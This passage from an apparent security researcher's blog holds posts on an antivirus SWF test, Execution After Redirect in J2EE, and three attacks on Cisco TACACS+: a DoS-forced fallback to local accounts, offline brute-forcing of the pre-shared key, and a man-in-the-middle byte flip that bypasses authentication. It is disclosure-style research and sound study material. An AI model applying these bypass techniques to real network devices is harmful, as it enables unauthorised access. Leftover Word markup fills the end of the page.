Then I've tested the PoC on Kaspersky AV, but, unfortunately, unsuccessfully. KAV intercepts traffic from browsers, but it doesn't want to intercept connections from the swf (to any port).<br />
<br />
I'm not an AV guru, so I'm sure that I've missed something. So I've decided to share this idea and these weird results to get some feedback from you.<br />
You can play with SWF here <a href="https://dbggl.pw/flashav.swf">https://dbggl.pw/flashav.swf</a> Nginx (443) and ncat (465, 995) are started on the server for testing.<br />
<br />
<br /></div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com3tag:blogger.com,1999:blog-8095956197947792822.post-10554834760154303942016-02-01T15:01:00.001-08:002016-02-01T15:01:15.882-08:00Mini-post: Execution After Redirect for J2EE<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 style="text-align: left;">
About EAR</h3>
Several years ago a white paper about a “new” type of vulnerability – Execution After Redirect was published <a href="http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf">http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf</a>.<br />
This is a “logical” vulnerability. And the idea of EAR is pretty simple. A web application does not halt execution after returning Redirect header to user and it continues execution. Therefore, sometimes there is an opportunity to bypass authorization and perform some actions in the web application or steal some critical information.<br /><br />
The following example shows it clearer:<br />
<blockquote class="tr_bq">
<i>if (!(request.getParameter("pass").equals(adminPswd))) {<br /> response.sendRedirect("login.jsp");<br /> }<br />admin.critFunc();</i></blockquote>
If a user inputs an incorrect password, a web application sends a response to the user with the redirect header to a login page. Otherwise, it executes some critical functions.<br />And in case of EAR vulnerability, the web application continues execution even after the sendRedirect function. <br />Actually, the possibility of EAR depends on framework/platform’s specifics. There is a list of frameworks in the white paper where EAR vuln can be found.<br />Also, there is a subtype of EAR – blind EAR. This is when a web application doesn’t return any output to user after a redirect function. And only this subtype is possible in J2EE applications.<br />
<br />
<h3 style="text-align: left;">
Something new?</h3>
I would like to share the result of a little research on EAR for J2EE, because the problem is wider here.<br />So, for redirection we use: <br />
<blockquote class="tr_bq">
<i>response.sendRedirect("any.jsp");</i></blockquote>
And a web application continues execution after this function.<br />But also there is a forwarding function (when a full user request is passed from one servlet/script to another within the web application):<br />
<blockquote class="tr_bq">
<i>request.getRequestDispatcher("any.jsp").forward(request, response);</i></blockquote>
Moreover, we can return an error page to a user:<br />
<blockquote class="tr_bq">
<i>response.sendError(500, "Text of Error");</i></blockquote>
In both of these cases, a web application continues execution too. So, we have here <b>Execution After Forward</b> and <b>Execution After Error</b> ;)<br /><br />It’s been interesting for me to check built-in features of JSP and JSTL:<br />1) JSP gives us an ability to forward a request:<br />
<blockquote class="tr_bq">
<i><jsp:forward page="any.jsp"></jsp:forward></i></blockquote>
2) with JSTL we can redirect a user:<br />
<blockquote class="tr_bq">
<i><c:redirect url="any.jsp"/></i></blockquote>
But in the both cases, the web application doesn’t execute code after these tags. Why so?<br />If we look at the "converted" JSP files to java classes, we can see:<br />1) For "forward":<br />
<blockquote class="tr_bq">
<i>if (true) {<br /> _jspx_page_context.forward("any.jsp");<br /> return;<br /> }</i></blockquote>
2) For "redirect":<br />
<blockquote class="tr_bq">
<i> if (_jspx_meth_c_005fredirect_005f0(_jspx_page_context))<br /> return;</i></blockquote>
Thus, returns “stops” a web application execution.<br /></div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-78071695687258435022015-11-23T06:17:00.002-08:002015-11-23T06:17:21.706-08:003 Attacks on Cisco TACACS+: Bypassing the Cisco's auth<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br />
I would like to tell the results of my little security research of TACACS+ protocol.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
What is TACACS+?</h3>
Usually, if a company has a big network with a lot of network devices, it may be a big problem to manage access to them. Thus, companies implement one of the protocols for centralized access management. Cisco devices support TACACS+ and RADIUS protocol.<br /><br />So, Terminal Access Controller Access-Control System Plus (TACACS+) is a special protocol of AAA (Authentication, Authorization, Accounting) from Cisco. TACACS+ uses 49 TCP port.<br /><br />So, usually there is a special server with TACACS+ service, and all network devices are configured to use it. Consequently, when a user authenticates on a switch, a router or another network device, the network device resends the user’s credentials to the TACACS+ service, where they are verified and then it decides to grant access to the device. The decision returns to the device in a reply packet.<div style="text-align: left;">
<br />
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7sTr5HYId4xFZGdy4lwzVazHY8TxN3fQUYSXm36c6pG4bWN0sFI4r8cigZzswJ5N_QtmMnjvI7EhHqxqVGiGdgxtsSPeYDTdAmEGqtBrHJF8e-xFikT90jtMCncRpvqTsc8MINrT8Yxq/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7sTr5HYId4xFZGdy4lwzVazHY8TxN3fQUYSXm36c6pG4bWN0sFI4r8cigZzswJ5N_QtmMnjvI7EhHqxqVGiGdgxtsSPeYDTdAmEGqtBrHJF8e-xFikT90jtMCncRpvqTsc8MINrT8Yxq/s320/1.png" width="320" /></a></div>
<div style="text-align: left;">
<br />
It’s handy, and centralized. There is an opportunity to set different privileges for users on different devices. There is logging of access and operations on the server side (accounting).There is the opportunity to add another one centralized management, like Active Directory or LDAP. There is an open source realization of TACACS+ service (once Cisco opened the specification of the protocol). </div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Attack #1</h3>
<div style="text-align: left;">
The first attack looks more like a trick, and not likethan a full attack type. But it could be useful in some situations.<br /><br />Let’s pretend a situation.imagine, that dDuring a pentest we grabbed a configuration file of a Cisco device (for example, we downloaded it from a company’s TFTP server). That’s cool, but even if we successfully bruteforce a local account of the device, we will not be able to log into the device, because the device will verify the local account on a TACACS+ service…<br /><br />But here we should have a look at a typical configuration of a network device in case of usage the TACACS+. AssumeLet’s pretend , that something is has happened with a TACACS+ server and the serverit is not accessible from the network device. And an An admin wants to log in, but he cannot do it. To solve such a typical situation, Cisco devices support different kinds on of authentication (fallback), which the admin have has to set up in a config.<br /><br />So, the classic authentication configuration of authentication on a cisco Cisco device with the TACACS+ looks something like that:</div>
<blockquote class="tr_bq">
<i>aaa authentication login default group tacacs+ local</i></blockquote>
<div style="text-align: left;">
There are two important words for us at the end.Only two last words are important for us. They set indicate that at first the TACACS+ is used for authentication and then the network device verifies a user’s credentials in a local db. Also, if the user’s credentials is are not found by TACACS+, they will not be verifies verified localylocally.<br /><br />The idea of the first attack is pretty simple. We, as pentesters, perform a DoS attack on the TACACS+ service, and then we connect to the Cisco device with the local account (that we got from TFP in our example). And as the TACACS+ service is not accessible, the network device gives as us a desired access. We can use different kind of DoS attacks. For example, we can created a lot of TCP- connections to the service and perform temporary DoS. <br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ea68jxoaKWxketUwnIeF-w9IGWxS4VHCAEVz3y6WuEyJXQGeFgs4x_7dYZSmKTYxI2r7wVX0EcJZWlzpn1SzCXNhoiElgCmVGNRMP0-4o_N3Oq2TDzS1S4b8gjGEwGG31WgrBWniD5KI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ea68jxoaKWxketUwnIeF-w9IGWxS4VHCAEVz3y6WuEyJXQGeFgs4x_7dYZSmKTYxI2r7wVX0EcJZWlzpn1SzCXNhoiElgCmVGNRMP0-4o_N3Oq2TDzS1S4b8gjGEwGG31WgrBWniD5KI/s320/2.png" width="270" /></a></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Intro for attacks №2 and №3</h3>
Before we move on to next attacks, we should know learn something else about the TACACS+ protocol. The data of the protocol is transmitted in plain- text or encrypted. It uses a custom encryption based on PSK (Pre-Shared Key). An admin set one encryption key on a TACACS+ server and on all network devices, which have to be able to connect to the server.<br /><br />It’s important to notice that only “user’s” data is encrypted. Main headers of TACACS+ protocol are not encrypted. As I know, the encryption works in next the following way:<br /><br />Encrypted data (enc_data) is a result of the XOR operation with data (data) and a special string (pseudo_pad) <blockquote class="tr_bq">
<i>data^pseudo_pad=enc_data</i></blockquote>
<div style="text-align: left;">
pseudo_pad is a concatenation of several MD5 hashes.</div>
<blockquote class="tr_bq">
<i>pseudo_pad = {MD5_1 [,MD5_2 [ ... ,MD5_n]]}</i></blockquote>
MD5-hashes are created from data of headers of TACACS+ packets and the key (PSK) and a previous MD5 hash (consequently, there is no a previous hash for a first MD5 hash).<blockquote class="tr_bq">
<i>MD5_1 = MD5{session_id, key, version, seq_no}<br />MD5_2 = MD5{session_id, key, version, seq_no, MD5_1}<br />....<br />MD5_n = MD5{session_id, key, version, seq_no, MD5_n-1}</i></blockquote>
Where:<br />session_id – is a random identifier of a session; version – a version of TACACS+ protocol; <br />seq_no – incremented number of a packet of a session; key – PSK.<br /><br />And as we can see from the picture the data is encrypted. <div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiosOCCVJeslseyX34HJSxq6t9j_CHa03974k05l5dZ7gLKmD3qqQIW8AZpLiyDXYuPDG65M0paAW9v2VGM4qqOQDQqugAWcmJ5uajHpbXrqpRhZDDnLfsD4vOE8kCHrdOkSHhaWAQgec/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiosOCCVJeslseyX34HJSxq6t9j_CHa03974k05l5dZ7gLKmD3qqQIW8AZpLiyDXYuPDG65M0paAW9v2VGM4qqOQDQqugAWcmJ5uajHpbXrqpRhZDDnLfsD4vOE8kCHrdOkSHhaWAQgec/s400/3.png" width="400" /></a></div>
<br /></div>
<h3 style="text-align: left;">
Attack №2</h3>
So, let’s set the situation for the next attack. There is a Cisco network device and there is a TACACS+ server. And we’ve got some of encrypted TACACS+ traffic between the device and the server (with obtained by Man-in-the-Middle attack, for example). It’s obviously, that our goal is to get a PSK. With it we will be able to decrypt the traffic and get valid accounts from it.<br /><br />Now, let us see how we can do it. At first, we can see that any MD5 hash (especially first MD5) consists of several values. But only one of them is unknown for us – a PSK. All other values (session_id, version, seq_no) we can get from headers of the TACACS+ packet. Thus, the whole idea of the task comes to a typical one – the local/offline bruteforce attack to get the PSK. And we know that we can bruteforce really-really fast with MD5. But at firstin the beginning we need to get a first MD5 hash (MD5_1)<br /><br />Now, let’s remember that XOP is a reversibility operation. In the other words, as we have the operation “data^pseudo_pad=enc_data”, we can convert it to “pseudo_pad=data^enc_data”. Also, there is another property: changing of a part of string doesn’t influence (change) other parts of string in the XOR operation. So, we have that MD5_1 is just a first part of “pseudo_pad”. Exactly, 128 bits (or 16 bytes) of “pseudo_pad”. And if we want do get MD5_1, we need to know 16 bytes of encrypted and decrypted data (“data”). We can get any amount of encrypted data from the traffic. But where/how can we get 16 bytes of decrypted data?<br /><br />
It is important to note that formats of requests and responses are different for Authentication, Authorization, Accounting types of the TACACS+ packets. However, there is a common idea for all of them: there is almost no unknown or random values in the first 16 bytes of any packet type.<br /><br />I will not go deep in technical details of each packet types. Just one example to show an the idea. This is the first response (pic. below) from a TACACS+-server. It consists of several fields having single meaning and a greeting message of a Cisco device for a user. As we can easily get the message from the Cisco device with any connection to it. Thus, we know all values of fields.<br />
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSf09gyKcRsZmRKgPuqaW6YYQNlolYfAIq_PMEfErbcTVca-ckwBRvQV6xmG5AL16gHZP0MLoxFPgLI97vt7NIBNOaQzoStdJRzsmiVPSh5vCcAYCFpljLMa2NjLyLVd8cMoBU-OIfg78C/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSf09gyKcRsZmRKgPuqaW6YYQNlolYfAIq_PMEfErbcTVca-ckwBRvQV6xmG5AL16gHZP0MLoxFPgLI97vt7NIBNOaQzoStdJRzsmiVPSh5vCcAYCFpljLMa2NjLyLVd8cMoBU-OIfg78C/s320/4.png" width="320" /></a></div>
Therefore, we almost always know decrypted data of the first 16 bytes of any packet. So we can get MD5_1 and perform a bruteforcing attack locally. If we have success with our attack, we will be able to decrypt the whole traffic.<br /><br />To simplify packet parsing and receiving MD5_1, I've created a little script – tac2cat.py. It’s a part of the TacoTaco project.</div>
<div style="text-align: left;">
<br />
<br /></div>
<h3 style="text-align: left;">
Attack №3</h3>
So, the situation of the last attack. There is a Cisco network device and a TACACS+ server. We perform an active MaiMan-In-the-Middle attack (we can change the traffic). Our goal is to get full access to the Cisco device.<br /><br />Reviewing the protocol, I have spotted two additional “features”.<br /><br />The first one is that the protocol doesn’t have the integrity checking. So, if we change some parts of the encrypted traffic, it changes decrypted traffic (because it’s just XOR), but a TACACS+ server can’t find out the changes and processes the changed traffic in a usual way.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPl5a7HKyLRwTpjUy9DzAIfyyI_3hmntjrv936VOuSX7qB5OxTU5LxYw4UuoSJd78MZjLfU70zJAyIIx6tkPtehs2jp5Lwavnly7ndqQW4kf2bN5S8OXAjgcByljPZa2_WUoohifQQ53qx/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPl5a7HKyLRwTpjUy9DzAIfyyI_3hmntjrv936VOuSX7qB5OxTU5LxYw4UuoSJd78MZjLfU70zJAyIIx6tkPtehs2jp5Lwavnly7ndqQW4kf2bN5S8OXAjgcByljPZa2_WUoohifQQ53qx/s320/6.png" width="320" /></a></div>
<br />
The second feature is about the format of TACACS+ packets. For Authentication and Authorization process, the first byte of reply contains the result of access granting.<br />For example, “0x01” if the server authenticates the user (grants access), and “0x02” if the user’s credentials is not valid. <br />Altogether, we just need to change one byte of the reply from the server! In a common view, we need to perform next consequence:<br /><ul style="text-align: left;">
<li>Get the “pseudo_pad” of this byte: XOR the encrypted byte and the decrypted byte (we know the value of the decrypted byte, because if we input incorrect credentials, we know that the server refuses the access and sets 0x2.</li>
<li>XOR this “pseudo_pad” with the byte for successful authentication (0x01)</li>
<li>Out this new byte into the encrypted packet and sent it to the server.</li>
</ul>
Therefore, with the MitM attack we can change the traffic and grant access (authentication, authorization) for any user with invalid credentials. Also we can bypass the authentication for the privilege escalation on a Cisco device (“enable” password).<br />
<br />To perform the MitM attack I created a little tool – tacflip.py. It’s a part of the TacoTaco project.<br />
<br />I’ve successfully checked the attack (authentication, authorization bypass and privilege escalation) on a 7200 Cisco route in GNS3 and an open source realization of a TACACS+ server – tac_plus. There is a part of configuration file of the router:<br />
<br />
<blockquote class="tr_bq">
<i>aaa authentication login default group tacacs+ local<br />aaa authentication enable default group tacacs+<br />aaa authorization exec default group tacacs+ local<br />tacacs-server host 192.168.182.136<br />tacacs-server directed-request<br />tacacs-server key 12345</i></blockquote>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
And there is a small demo video of authentication/authorization bypass, privilege escalation and following command execution on the Cisco route.<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/HdTib8wftHA/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/HdTib8wftHA?feature=player_embedded" width="320"></iframe></div>
<br />
<h3 style="text-align: left;">
Sometimes it happens…</h3>
In 2000 Solar Designer made an interesting research of the TACACS+ protocol <a href="https://goo.gl/E2IGnk">https://goo.gl/E2IGnk</a>. For example, he found the opportunity of a replay attack, a user’s password’s length disclosure, a bit flipping attack and etc. But I didn’t find PoCs for them.<br /><br />My “research” of TACACS+ protocol is just some thoughts after some random interactions with the protocol during long time. Because of that, I forgot<br />about the results of Solar Designer and reopened some of his findings.<br /><br />So, may be the most important result of my work may be is the TacoTaco project <a href="https://github.com/GrrrDog/TacoTaco">https://github.com/GrrrDog/TacoTaco</a>. It consists of scripts for to realization execute of the attacks of this article.<br /><h3 style="text-align: left;">
Conclusion:</h3>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
